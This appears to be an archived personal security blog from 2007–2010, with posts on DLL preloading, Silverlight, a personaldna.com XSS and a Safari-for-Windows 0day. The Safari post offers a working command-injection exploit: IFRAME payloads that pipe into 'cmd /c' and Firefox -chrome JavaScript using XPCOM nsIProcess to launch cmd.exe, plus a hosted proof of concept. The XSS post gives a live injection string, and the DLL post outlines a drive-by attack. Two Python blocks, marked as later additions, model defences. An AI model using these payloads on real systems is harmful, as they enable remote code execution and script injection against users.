Larholm.com

Me, myself and I

August 24th, 2010

Exploiting DLL Preloading remotely without user interaction

Microsoft published an article yesterday about DLL Preloading on TechNet.

The basic premise behind a DLL Preloading attack is simple: unless you explicitly specify the full path to each DLL you load, it might be loaded from the current directory. That current directory might contain a file called “xyz.dll” which will then get loaded into your process instead of the original “xyz.dll” from your installation directory.

This is a class of vulnerabilities that affects a wide range of applications, but its severity has so far been considered local and low impact.

It seems that Microsoft has been made aware of a remote attack vector that allows you to exploit DLL Preloading from a webpage.

The TechNet article does not mention what that attack vector is, so for the sake of debate I will highlight the most logical steps you will need to perform to remotely exploit DLL Preloading without any user interaction other than visiting a website :)

  1. Get user to visit malicious website
  2. Malsite contains an IFRAME pointing to an SMB/WebDav share
  3. The share contains a non-malicious file which can be automatically opened without warnings, such as a .JPG or .DOCX file, as well as a malicious file called “xyz.dll”
  4. The non-malicious file is then automatically opened through clickjacking
  5. The local process responsible for handling the non-malicious file, such as word.exe, is launched and starts looking for its DLL dependencies, such as “xyz.dll”
  6. The current working directory is set to the malicious share because the non-malicious file was opened from here
  7. Unless explicitly handled by the local process, “xyz.dll” will be loaded from the current working directory, the malicious share, the contents of which are controlled by the attacker
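The search order that makes step 7 possible, as an added example that is not part of the original post and not Microsoft's code: a small Python model of the Windows DLL search order (SafeDllSearchMode on, and the legacy order for comparison), applied to a constructed file system in which a document was opened from a share, plus the same lookup after the current working directory has been removed from the search path, which is what a call to SetDllDirectory("") achieves. The application directory, the share name, the file names and the DLL names are all constructed for the demo.

```python
# Added example, not from the original post and not Microsoft's code: a model
# of the Windows DLL search order used to show why an unqualified
# LoadLibrary("xyz.dll") can resolve to the current working directory, and
# what removing the CWD from the search order (SetDllDirectory("")) changes.
# Every directory, file and DLL name below is constructed for the demo.

APP_DIR = r"C:\Program Files\Office\Word"
SYSTEM_DIRS = [r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows"]
PATH_DIRS = [r"C:\Program Files\Tools"]
DOCUMENT_DIR = r"\\fileshare.example\docs"   # CWD once a document is opened from the share

# Constructed file system: word.exe probes for an optional "xyz.dll" that it
# does not ship, so no trusted directory contains a file of that name.
FILESYSTEM = {
    r"C:\Program Files\Office\Word\word.exe",
    r"C:\Program Files\Office\Word\core.dll",
    r"C:\Windows\System32\kernel32.dll",
    r"\\fileshare.example\docs\report.docx",
    r"\\fileshare.example\docs\xyz.dll",      # untrusted copy sitting next to the document
}


def search_order(cwd, safe_dll_search_mode=True, cwd_removed=False):
    """Directories probed for an unqualified DLL name, in load order."""
    order = [APP_DIR]
    if not safe_dll_search_mode:      # legacy order: CWD right after the application dir
        order.append(cwd)
    order += SYSTEM_DIRS
    if safe_dll_search_mode:          # SafeDllSearchMode: CWD only after the system dirs
        order.append(cwd)
    order += PATH_DIRS
    if cwd_removed:                   # effect of SetDllDirectory("") in the process
        order = [d for d in order if d != cwd]
    return order


def resolve_dll(name, cwd, **kwargs):
    """Path the loader would pick for `name`, or None if nothing is found."""
    lower_fs = {p.lower() for p in FILESYSTEM}
    if "\\" in name:                  # fully qualified name: no search at all
        return name if name.lower() in lower_fs else None
    for directory in search_order(cwd, **kwargs):
        candidate = directory + "\\" + name
        if candidate.lower() in lower_fs:
            return candidate
    return None


if __name__ == "__main__":
    print(resolve_dll("core.dll", DOCUMENT_DIR))                    # found in the app dir
    print(resolve_dll("xyz.dll", DOCUMENT_DIR))                     # falls through to the CWD
    print(resolve_dll("xyz.dll", DOCUMENT_DIR, cwd_removed=True))   # None: nothing trusted has it
    print(resolve_dll(r"C:\Program Files\Office\Word\xyz.dll", DOCUMENT_DIR))  # None: no search
```

The lookup for "core.dll" stops at the application directory, while "xyz.dll" walks the whole order and ends up at the document's directory because no trusted directory holds a file of that name; the two process-side fixes the model shows are dropping the CWD from the search order and loading optional DLLs by fully qualified path, which is never searched for at all.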

The only reason I am not giving this post the title of 0-day is because this has been known for some time and I have not bundled this as an exploit for you – I am on my way to work right now :)

April 6th, 2010

Looking into Chrome

I am currently trying to set up a proper build environment for Google Chrome, so that I can test some crashes in more detail.

It seems amazing that a brief line of Javascript code is able to completely freeze the Chrome process and all its threads, but I am guessing it is a synchronization issue when talking with the Win32 API.

More details should come about if I finally get Chrome building locally, otherwise I’ll consider just posting some reproducible test cases and let somebody else look into exploiting it.

It’s part of the screen update process and also freezes the Sandbox broker process, so with some luck this should be running outside the Chrome sandbox :)

April 6th, 2010

Community Day 10 in Copenhagen

Community Day is back again this year in Copenhagen.

If you like free tech-talks, networking and beer then reserve May 27 for Community Day ‘10.

There will be some 20 sessions on four concurrent tracks, with 45 minutes of presentation time and 30 minutes for Q&A.

Most of the session titles are already set, ranging from HTML5 to Firefox plugin development and Ruby on Rails, and the agenda will be updated soon with speaker names and details.

Casper Fabricius, an old colleague and friend, will be giving his talk called “Replace ASP.NET with IronRuby on Rails”.

I will also be giving two talks at CD10, “Hacking a website” and “Advanced jQuery”.

Sign up for Community Day ‘10 (it’s free!) and get ready for a day of geekery, networking and free beer :)

March 16th, 2010

Internet Explorer 9 at MIX – and Windows Phone 7 IE

I am currently at MIX 10 in Las Vegas together with Mads Kristensen and Kenneth Auchenberg.

The IE9 keynote was great and revealed many new facets of the upcoming Internet Explorer 9. There will be a new JScript engine, codenamed “Chakra”, lots of HTML 5 support and hardware acceleration of almost all rendering aspects – not just for text and images, but also for SVG and video playback.

Chrome and Firefox were literally stuttering when they tried to play a single 720P video while IE9 was running smoothly with two simultaneous 720P streams, and the performance of the new Trident engine was even better when it came to animating SVG and CSS.

“Chakra” is still in development and can be experienced in the IE9 developer preview at ietestdrive.com. The current JScript engine in IE8 is JScript 5.8, whereas the new “Chakra” engine identifies itself as JScript 9.0. “Chakra” will compile Javascript in the background across multiple CPU cores, so I expect to see some reentrancy vulnerabilities.

I will dig deeper into IE9 when I get the chance, to see what kind of security vulnerabilities I can uncover.

Another point of interest at the conference is the upcoming Windows Phone 7 Series; the name is too long, they should really just remove the “Series” suffix.

I had a chance to play with the phone, but the Microsoft guys were not really that keen on revealing what browser version it is running. Despite this, I managed to secure a copy of the useragent string:

Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6

Unlike the iPhone, Windows Phone 7 will launch with a browser that does not support the latest web standards. Far from it, actually, as IE7 is already starting to feel outdated. There is some consolation, in that the mobile version of IE7 will incorporate some of the new technologies from IE8.

Anyway, back to the conference...

Update: I am covering the latest buzz surrounding IE9 at IE9Buzz.com :)

August 31st, 2007

Silverlight 1.0 Release Candidate

Yesterday I was at a Silverlight conference in Copenhagen which was actually quite interesting. For those of you who might not know what Silverlight is, it is a Flash competitor developed by Microsoft based on Windows Presentation Foundation and XAML. If you are not interested in Silverlight development in general then jump straight to the end of this article for the vulnerability :)

Jeppe Rørbæk from Microsoft Denmark gave the first presentation, which mainly focused on the basics of embedding Silverlight 1.0 and creating XAML files. I have been experimenting with Silverlight since the first CTP release back in December 2006, so most parts of this presentation were a bit repetitive for me. The main consensus that I could get from the other attendees was that Microsoft should focus on shipping a default Aspx Extender for embedding Silverlight applications, as I seemed to be the only one comfortable enough with Javascript to really bother getting my hands dirty. The lack of input controls in the 1.0 release was also a bit discomforting to some, although regular HTML input boxes can be used in their place.

Next up was Martin Eiler from Valtech who focused on XAML development through Blend Expression. Martin showcased a video player application that he was currently developing, and I couldn’t help noticing the similarities between it and Joost, particularly when it came to the messaging aspects. Joost is written in Mozilla’s XUL and from the walkthrough of some of his code it was quite clear that Silverlight development is a lot more straightforward than dealing with the typical RDF hell in XUL development.

Martin's presentation also gave me the most ideas for what areas I should focus on when finding vulnerabilities in Silverlight. Font embedding in Silverlight is vastly simpler than in Flash and it is accomplished through automatically downloading a ZIP file containing a TrueType font which is then parsed and rendered on your XAML text. I could imagine that fuzzing the TrueType renderer might uncover some interesting parsing vulnerabilities. Failing that, there is some interesting potential for directory traversal vulnerabilities through the Downloader object in Silverlight, which will automatically decompress ZIP archives and store their content on your local hard drive. Since the plugin itself is not written in managed code and is responsible for parsing and rendering not just TrueType fonts but also PNG, BMP, TIFF and WMF images, I will also have a go at it with some image fuzzing and see what stands out.

Next up was Niels Hartvig, founder of the open source Umbraco CMS. The first part of his presentation focused on a Powerpoint replacement that Niels had developed in Silverlight, which was a great success with the audience. This transitioned into an example of how Umbraco, or any other CMS, could be extended to serve dynamic XAML documents (Silverlight applications). The audience was mainly comprised of ASP.NET and back end developers, so the presentation was a natural fit and most likely inspired a couple of developers on how they could more easily use Silverlight as a presentation layer. Unfortunately his Powerpoint replacement was written for Silverlight 1.0, so all of the XAML generation and event handling relied heavily on Javascript. I would love to see a 1.1 release with all of the interaction dynamics staying in C#. Just as with the regular DOM the Silverlight Object Model will only allow you to retrieve data from the domain where it was served, but seeing as the Silverlight team has probably had to implement this logic themselves instead of borrowing from IE there could be some interesting potential for terminating string references (think %00).

Jeppe Rørbæk finished off the conference with a look at some of the new features in Silverlight 1.1, particularly the CLR and DLR implementations which will be a part of the plugin bundle. Most of the audience seemed thrilled enough with the new vector and video capabilities of Silverlight 1.0, but having the promise of a C# CLR embedded in the browser dangling in front of them left most with the impression that they should neglect the 1.0 release until they could do some “real” work in 1.1.

There will still be a lot of Javascript interfacing in 1.1, which is only natural when you are interfacing with the DOM of your HTML document. From what I could see in Jeppe’s code it seems apparent that exposing events to Javascript from the managed C# code is implemented by assigning a JS function reference on an exposed property. This will let you call unmanaged code from C# and since I can control the entirety of that pointer reference I can imagine that this will also be a candidate for vulnerabilities.

And speaking about vulnerabilities, I thought I would detail a vulnerability that was silently patched in the Release Candidate of Silverlight :)

The beta release of Silverlight 1.0 had a heap overflow on the findName method which occurs after handing it a string larger than 260086 bytes.

Realistically speaking, this has not been a threat to a lot of people. Unlike the Safari 3.0 release for Windows, which received millions of end user installations after being featured prominently on the frontpage of apple.com, the beta release of Silverlight has gone largely unnoticed outside of developer circles.

What is more interesting than the vulnerability itself, at least to me, is that it highlights how Microsoft has not implemented static source code analysis as part of either their commit cycles or beta release builds. This seems to be reserved for release candidates and greater.

To sum it all up, I think that Silverlight is an interesting technology and a worthy Flash competitor. Adobe has suddenly seen some actual competition arise, which has pushed them to update their Flash player with H.264 video and AAC audio playback. Whether Youtube decides to stay with Flash or go with HD quality WMV, this can only be good news, as we can hopefully abandon those awful-looking FLV files.

And whether or not any of that happens I have found an interesting new product to uncover some vulnerabilities in, so remember to subscribe to the feed :)

June 21st, 2007

Who made OSI king of the world?

This is not strictly security related, but I just had to write a few words about that OSI article. Rest assured that you will get some security news very soon, I found half a dozen new vulnerabilities in Safari for both Windows and OS X :)

Over at opensource.net Michael Tiemann, the president of the Open Source Initiative, has written an article about the apparent misuse of the term open source. He has declared that they (OSI) want to clamp down on any vendor who claims to be open source but does not use “an OSI-approved license”. In his own words:

“Enough is enough. Open Source has grown up. Now it is time for us to stand up. I believe that when we do, the vendors who ignore our norms will suddenly recognize that they really do need to make a choice: to label their software correctly and honestly, or to license it with an OSI-approved license that matches their open source label.”

I generally applaud the Open Source Initiative for their dedication in promoting open source software, but the entire premise of this article does not ring true for me. This is my public comment to Michael Tiemann, originally posted as a comment to his article.


June 12th, 2007

Site overload, back in business

I went to the beach today at around 16:00 (4 PM) after having moderated all of your comments on my previous post “Safari for Windows, 0day exploit in 2 hours”. When I got back just now at 21:00 (9 PM) this site was no longer serving any content and a lot of people had mailed me to complain.

I am running WordPress and it was not all too happy about the abundance of visitors that came by my site today. In the last 12 hours more than 30.000 unique visitors generated more than 180.000 hits, which is quite a jump from my normal rate of 500 unique visitors per day. I guess you people like to read about security research, especially Slashdot, TechMeme and Reddit :)

Luckily I had the support of a great technical team, namely Tyron from HostGator.com where my site is hosted. After a brief live chat the site was back up and running just fine. I’m amazed at the level of support I have received so far from HostGator and am only happy to recommend them through the previous link (yes, it’s an affiliate signup).

So what happens next? First of all, I have read through all of your feedback about the PoC exploit and will do some tests on OS X tomorrow that will result in a positive or negative verification about whether the vulnerability can be adjusted to work on OS X as well.

Following that, I will continue to write about my security research and publish any new findings here – so remember to subscribe to my feed :)

June 12th, 2007

Safari for Windows, 0day exploit in 2 hours

Apple released version 3 of their popular Safari web browser today, with the added twist of offering both an OS X and a Windows version. Given that Apple has had a lousy track record with security on OS X, in addition to a hostile attitude towards security researchers, a lot of people are expecting to see quite a number of vulnerabilities targeted towards this new Windows browser.

I downloaded and installed Safari for Windows 2 hours ago, when I started writing this, and I now have a fully functional command execution vulnerability, triggered without user interaction simply by visiting a web site. I will not sell this one to ZDI or iDefense but instead release it here, as I have done lately with a number of 0day vulnerabilities. This place is where you get my latest research :)

A bunch of other security researchers such as David Maynor and Aviv Raff have been pounding safariWin with their fuzzing tools, going through thousands upon thousands of test pages in the hopes of triggering some form of memory corruption for potential exploitation. I am a big fan of fuzzing and believe it can produce some tremendous results, but sometimes good old fashioned application specific knowledge can get you far.

The logic behind this vulnerability is quite simple and the vulnerability class has been known and understood for years, namely that of protocol handler command injection. A browser typically consists of a multitude of different URL schemes, some of which are handled by internal functions and others that are handed off to external applications. On the OS X platform Apple has enjoyed the same luxury and the same curse as Internet Explorer has had on the Windows platform, namely intimate operating system knowledge. The integration with the originally intended operating system is tightly defined, but the breadth of knowledge is crippled when the software is released on other systems and mistakes and mishaps occur. You can still find references to the OS X proprietary URL protocols open-help-anchor: and network-diagnostics: inside the resource files for the Windows release.

URL protocol handlers on the Windows platform work by executing a process with specific command line arguments. When Apple released Safari for the Windows platform they neglected to implement a proper level of input validation for these arguments, which means that you can break out of the intended confines and wreak havoc. A typical request for a URL such as myprotocol://someserver.com/someargument would be turned into a command line resembling the following.

"C:\Program Files\My Application\myprotocol.exe" "someserver.com/someargument"

This works almost as expected in Safari. With a simple link you cannot pass arbitrary characters along to the command line that is later executed; most attempts at doing so are simply URL escaped, such that myprotocol://someserver.com/some"[SPACE]argument is turned into

"C:\Program Files\My Application\myprotocol.exe" "someserver.com/some"%20argument

This cannot be used to exploit Safari as the command line to be executed is simply invalid. However, Safari does not properly validate the input when these same requests are handled through IFRAME elements, such as

<iframe src='myprotocol://someserver.com" < foo > bar | foobar "arg1'></iframe>

which is turned into the following command line.

"C:\Program Files\My Application\myprotocol.exe" "someserver.com" < foo > bar | foobar "arg1"
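The substitution and its failure mode, as an added Python example that is not part of the original post and not Apple's or Mozilla's code: the handler's command template is filled in naively, as described above, and then with the URL percent-encoded first, and a small CommandLineToArgvW-style tokenizer checks whether the URL still arrives at the handler as one quoted argument. The handler path, the scheme and the sample URLs are constructed; the tokenizer only models quote toggling and backslash-escaped quotes, which is enough to show both the break-out above and the trailing-backslash case a quoting-only fix misses.

```python
# Added example (not code from the original post, nor Apple's or Mozilla's):
# a model of how a Windows URL protocol handler's registered command template
# is filled in from a URL, plus a CommandLineToArgvW-style tokenizer used to
# check whether the URL stayed inside its quoted argument. The handler path,
# scheme and URLs are constructed; the tokenizer covers only quote toggling
# and backslash-escaped quotes.
from urllib.parse import quote

SCHEME = "myprotocol"
HANDLER_TEMPLATE = r'"C:\Program Files\My Application\myprotocol.exe" "%1"'


def build_command_naive(url):
    """Substitute the URL verbatim: a handler invocation with no input validation."""
    return HANDLER_TEMPLATE.replace("%1", url)


def build_command_safe(url):
    """Percent-encode everything a URL does not need before substituting, so
    '"', '\\', '<', '>', '|' and whitespace can never reach the command line."""
    if not url.lower().startswith(SCHEME + "://"):
        raise ValueError("URL is not for this handler")
    # '%' is kept so escapes already present in the URL are not double-encoded.
    encoded = quote(url, safe=":/?#[]@!$&'()*+,;=%")
    return HANDLER_TEMPLATE.replace("%1", encoded)


def win_argv(cmdline):
    """Split like CommandLineToArgvW: quotes group words; 2n backslashes before
    a quote give n backslashes, 2n+1 give n backslashes plus a literal quote.
    Returns (argv, quotes_balanced)."""
    argv, cur, in_quotes, i = [], [], False, 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == "\\":
            n = 0
            while i < len(cmdline) and cmdline[i] == "\\":
                n += 1
                i += 1
            if i < len(cmdline) and cmdline[i] == '"':
                cur.append("\\" * (n // 2))
                if n % 2:                  # odd count: the quote is literal
                    cur.append('"')
                    i += 1
            else:
                cur.append("\\" * n)       # backslashes not before a quote are literal
            continue
        if c == '"':
            in_quotes = not in_quotes
        elif c in " \t" and not in_quotes:
            if cur:
                argv.append("".join(cur))
                cur = []
        else:
            cur.append(c)
        i += 1
    if cur:
        argv.append("".join(cur))
    return argv, not in_quotes


def url_stays_contained(cmdline):
    """True only if the handler receives exactly one argument, the quoting is
    balanced, and that argument is still a URL for our scheme."""
    argv, balanced = win_argv(cmdline)
    return balanced and len(argv) == 2 and argv[1].lower().startswith(SCHEME + "://")


if __name__ == "__main__":
    benign = "myprotocol://someserver.com/someargument"
    breakout = 'myprotocol://someserver.com" < foo > bar | foobar "arg1'   # the IFRAME input from the post
    for url in (benign, breakout):
        print(url_stays_contained(build_command_naive(url)),
              url_stays_contained(build_command_safe(url)))
```

For the benign URL both builders produce the same command line and the check passes; for the break-out input the naive command line tokenizes into nine arguments, with "<", "foo", ">", "bar", "|" and "foobar" arriving as separate words, while the encoded version still arrives as a single argument. A URL ending in a backslash is the edge case worth keeping in mind: naive substitution turns the closing quote into an escaped literal quote, so the quoting is unbalanced even though there is still only one argument, which is why the safe builder encodes the URL rather than relying on quoting.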

As the knowledgeable reader might have noticed we now have everything we need to implement an attack against the entire range of available URL protocol handlers on the Windows platform. We could pick the telnet or callto protocols and provide unfiltered input to an argument of our choice. For this demonstration I have opted to attempt an exploit against the gopher: URL protocol which is handled by my local Firefox installation. We hash together an example request..

<iframe src='gopher://larholm.com" |cmd /c echo "FOO'></iframe>

...fire up procexp, launch Safari and watch the output.

"C:\PROGRA~1\MOZILL~3\FIREFOX.EXE" -url "gopher://larholm.com" |cmd /c echo "FOO" -requestPending

Now this might be fun enough, but what if we wanted something a bit more customizable? Firefox is built on top of the Mozilla XPCOM platform and we might as well use some of these capable interfaces at our disposal to handle process instantiation. The code we want to execute is the following.

C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath('C:\\windows\\system32\\cmd.exe');
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);
process.run(true,{},0);
alert(process);

Due to the levels of URL escaping the following might be a bit confusing to read, but feel free to dissect it for your own variations.


<iframe src='gopher://larholm.com" -chrome "javascript:C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath('C:'+String.fromCharCode(92)
+String.fromCharCode(92)+'Windows'
+String.fromCharCode(92)+String.fromCharCode(92)+'System32'
+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);
process.run(true,{},0);alert(process)'></iframe>

And there you have it, command execution. A fully functional PoC exploit is located below. Warning: This WILL crash your Safari browser on Windows. Close any existing Firefox processes that you might currently be running, then navigate Safari to the following page.

http://www.larholm.com/vuln/safaripoc.html

The above PoC exploit will exploit Safari by bouncing through Firefox via the Gopher protocol, passing on unfiltered input for the -chrome argument that Firefox exposes. When it has done this it will launch C:\Windows\System32\cmd.exe with any arguments that have been specified in the call to the process.run method.

It is important to know that, even though this PoC exploit uses Firefox, the actual vulnerability lies in the lack of input validation for the command line arguments handed to the various URL protocol handlers on your machine. As such, there are a lot of different attack vectors for this vulnerability; I simply chose Firefox and the Gopher URL protocol because I was familiar with these.

I hope you enjoyed the fruits of my 2 hours of labour. Please feel free to add my RSS feed to your reader and come back again tomorrow or next week for a fresh batch of 0day vulnerabilities :)

Cheers
Thor Larholm

UPDATE
The site was down for a couple of hours due to Slashdot, TechMeme and Reddit.

April 8th, 2007

Thor, the Benevolent Leader

I am always amused when I take a personality test. I find it easy to discern the reasoning behind the questions and more often than not I disagree with the wording of specific questions. Just today, I found an interesting test with some funky sliders and graphs at personaldna.com, and the results are in:

And there you have it, I am a very manly and functional Benevolent Leader with low Authoritarianism. You can hover those individual color bars for an explanation of each.

Incidentally, I am not a big fan of having Benevolent Leader turned into a link that points at personaldna.com as I have already been kind enough to link their way. So how do we remove this link but retain the hover functionality? If you’re curious, the script code for embedding the above color bar is:

<script src="http://personaldna.com/h/?k=ajbecRqMlZIdRcZ-OO-AAAAA-b077&t=Benevolent+Leader">
</script>

There is a lack of input validation of the t parameter which enables an XSS vulnerability on personaldna.com. If you specify t=Benevolent+Leader',true);alert(location)// you are overwriting their script logic. If you specify t=</a>Benevolent+Leader you are injecting HTML. A properly URL encoded parameter would be t=%3C/a%3EBenevolent+Leader.

So there you have it, the same colored bar but without a link on the text portion :)

April 5th, 2007

Cheers and musing

Another visitor!

You might know me, you might not. In either case, welcome. I used to have my web presence on jscript.dk, but alas some domain shark grabbed it when I forgot to renew the domain.

So what will I amuse you with to stay a while? Mostly random musings over security vulnerabilities, javascript development, the web and myself. In the mean time I will be making a less bloggy template for WordPress and enjoy my Easter vacation.
